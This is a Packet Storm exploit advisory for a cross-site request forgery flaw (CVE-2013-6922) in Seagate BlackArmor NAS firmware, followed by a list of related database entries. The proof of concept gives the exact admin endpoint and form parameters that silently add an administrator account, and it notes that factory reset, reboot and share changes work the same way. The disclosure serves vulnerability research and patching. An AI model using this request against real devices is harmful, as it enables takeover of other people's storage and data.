Lucene search
JeroenPACKETSTORM:124686HistoryJan 06, 2014 - 12:00 a.m.
Seagate BlackArmor NAS sg2000-2000.1331 Cross Site Request Forgery
2014-01-0600:00:00
Jeroen
packetstormsecurity.com
20
0.002 Low
EPSS
Percentile
62.2%
`# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery
# Google Dork: N/A
# Date: 04-01-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.seagate.com/
# Software Link:
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
# Version: sg2000-2000.1331
# Tested on: N/A
# CVE : CVE-2013-6922
#
## Description:
#
# There are multiple CSRF attacks possible, the proof of concept shows how
it is possible to add
# a user with administrative privileges to the system.
#
# It is also possible to:
#
# 1. Factory reset the device
# 2. Reboot the device
# 3. Add/Edit/Remove users
# 4. Add/Edit/Remove shares and volumes
#
# This vulnerability was reported to Seagate in September 2013, they stated
that this will not be fixed.
#
## Proof of Concept:
#
# POST: http(s)://<url |
ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23
# Parameters:
#
# username attacker
# adminright yes
# fullname hacker
# userpasswd attackers_password
# userpasswdcheck attackers_password
`
Related
cvelist
cvelist
CVE-2013-6922
2014-01-21 16:00:00
seebug
seebug
Seagate BlackArmor NAS sg2000-2000.1331θ·¨η«θ―·ζ±δΌͺι ζΌζ΄
2014-01-06 00:00:00
Seagate BlackArmor NAS sg2000-2000.1331 - Cross Site Request Forgery
2014-07-01 00:00:00
prion
prion
Cross site request forgery (csrf)
2014-01-21 16:06:00
cve
cve
CVE-2013-6922
2014-01-21 16:06:19
exploitpack
exploitpack
Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery
2014-01-06 00:00:00
nvd
nvd
CVE-2013-6922
2014-01-21 16:06:19
exploitdb
exploitdb
Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery
2014-01-06 00:00:00
openvas
openvas
Seagate BlackArmor NAS Multiple Vulnerabilities
2014-01-06 00:00:00